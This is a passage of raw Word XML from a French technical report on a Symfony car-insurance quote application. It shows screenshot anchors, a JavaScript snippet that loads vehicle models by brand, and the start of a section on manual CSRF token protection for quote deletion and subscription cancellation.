                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1682846</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="642395" cy="312517"/>
                <wp:effectExtent l="0" t="0" r="24765" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="248245482" name="Ellipse 22"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="642395" cy="312517"/>
                        </a:xfrm>
                        <a:prstGeom prst="ellipse">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="952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318D19" id="Ellipse 22" o:spid="_x0000_s1026" style="position:absolute;margin-left:41.45pt;margin-top:132.5pt;width:50.6pt;height:24.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" filled="f" strokecolor="#c9211e [3209]">
                <v:stroke joinstyle="miter"/>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D73F47" w:rsidRPr="00D73F47">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="609C5296" wp14:editId="482E84D3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2794000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2654300" cy="2362200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1131518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18137" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2654300" cy="2362200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00342B9B" w:rsidRPr="00342B9B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FBAF77E" wp14:editId="6594BFF6">
            <wp:extent cx="2628900" cy="2381250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="650106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06448" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2629037" cy="2381374"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2E9084" w14:textId="1D3ACC9B" w:rsidR="00FC7747" w:rsidRDefault="00FC7747" w:rsidP="00D73F47"/>
    <w:p w14:paraId="5DDA9144" w14:textId="3EC5F86A" w:rsidR="00FC7747" w:rsidRDefault="00177086" w:rsidP="00D73F47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251697152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="246F0B6A" wp14:editId="7FEC780C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>410845</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1231972</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="641985" cy="306287"/>
                <wp:effectExtent l="0" t="0" r="24765" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="1921759346" name="Ellipse 22"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="641985" cy="306287"/>
                        </a:xfrm>
                        <a:prstGeom prst="ellipse">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="952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D7A256E" id="Ellipse 22" o:spid="_x0000_s1026" style="position:absolute;margin-left:32.35pt;margin-top:97pt;width:50.55pt;height:24.1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" filled="f" strokecolor="#c9211e [3209]">
                <v:stroke joinstyle="miter"/>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251699200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A5F811B" wp14:editId="6352AC10">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3186993</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1499870</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="167833" cy="798597"/>
                <wp:effectExtent l="0" t="0" r="22860" b="20955"/>
                <wp:wrapNone/>
                <wp:docPr id="2029378493" name="Accolade ouvrante 28"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="167833" cy="798597"/>
                        </a:xfrm>
                        <a:prstGeom prst="leftBrace">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 34730"/>
                            <a:gd name="adj2" fmla="val 50000"/>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787FF" id="Accolade ouvrante 28" o:spid="_x0000_s1026" type="#_x0000_t87" style="position:absolute;margin-left:250.95pt;margin-top:118.1pt;width:13.2pt;height:62.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" adj="1577" strokecolor="#e00" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FC7747" w:rsidRPr="00FC7747">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251691008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63E98F9F" wp14:editId="539AB10A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2785110</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>20955</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2615565" cy="2381250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1334734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4588" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2615565" cy="2381250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00FC7747" w:rsidRPr="00FC7747">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26EB9F76" wp14:editId="2F0FA3F3">
            <wp:extent cx="2583712" cy="2381250"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="416933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33987" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2585138" cy="2382565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C8A44F" w14:textId="53675F09" w:rsidR="00FC7747" w:rsidRDefault="00FC7747" w:rsidP="00D73F47"/>
    <w:p w14:paraId="3C339DA4" w14:textId="77777777" w:rsidR="00D5693B" w:rsidRDefault="00D5693B" w:rsidP="00D5693B"/>
    <w:p w14:paraId="23335E71" w14:textId="77777777" w:rsidR="00D5693B" w:rsidRDefault="00D5693B" w:rsidP="00D5693B">
      <w:r>
        <w:t>Extrait de code JavaScript :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BAE1EE" w14:textId="77777777" w:rsidR="00D5693B" w:rsidRDefault="00D5693B" w:rsidP="00D5693B"/>
    <w:p w14:paraId="107A28E0" w14:textId="77777777" w:rsidR="00D5693B" w:rsidRPr="00D5693B" w:rsidRDefault="00D5693B" w:rsidP="007922BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D5693B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// selectModels.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397EE2CE"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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w: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795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loadModels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>brandName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CFD2F9"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fetch</w:t>
      </w:r>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`/quote/brand/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>brandName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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DD8800"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then</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(response</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt;</w:t>
      </w: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response.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB75744"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then</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239BC1CB"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const</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> select = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>querySelector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quote_vehicle_model</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2966466A"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select.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A816CA"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data.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>forEach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(model</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F2BC1"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const</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> opt = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>createElement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'option'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BE8C4B"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opt.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = model;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1018D26B"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select.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>appendChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(opt);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234D1D0D" w14:textId="77777777" w:rsidR="00D5693B" w:rsidRDefault="00D5693B" w:rsidP="007922BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE5980">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60604ED1" w14:textId="77777777" w:rsidR="00D5693B" w:rsidRDefault="00D5693B" w:rsidP="007922BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BC929F" w14:textId="77777777" w:rsidR="00D5693B" w:rsidRDefault="00D5693B" w:rsidP="007922BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605409F5" w14:textId="3DFDF13C" w:rsidR="00FC7747" w:rsidRDefault="00FC7747" w:rsidP="007922BB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD00C78" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="00540A83" w:rsidRDefault="003239D4" w:rsidP="00D5693B">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc233817761"/>
      <w:r w:rsidRPr="00540A83">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t>5.4.2 Traitement dynamique n°2 – Protection CSRF des actions sensibles</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="3B7AFE7B" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00D5693B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>La protection CSRF est implémentée manuellement sur toutes les actions destructives qui ne passent pas par le composant Form de Symfony : suppression d'un devis, annulation d'une souscription. Pour chaque action, un jeton unique est généré côté Twig et soumis avec la requête POST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788198EF" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="1ED50A61" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4">
      <w:r>
        <w:t>Extrait de code Twig :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC4DD5E" w14:textId="77777777" w:rsidR="00D5693B" w:rsidRDefault="00D5693B"/>
    <w:p w14:paraId="0E30C8E6" w14:textId="77777777" w:rsidR="00D5693B" w:rsidRDefault="00D5693B" w:rsidP="007922BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">{# Suppression d'un devis dans </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>account</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>quote.html.twig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
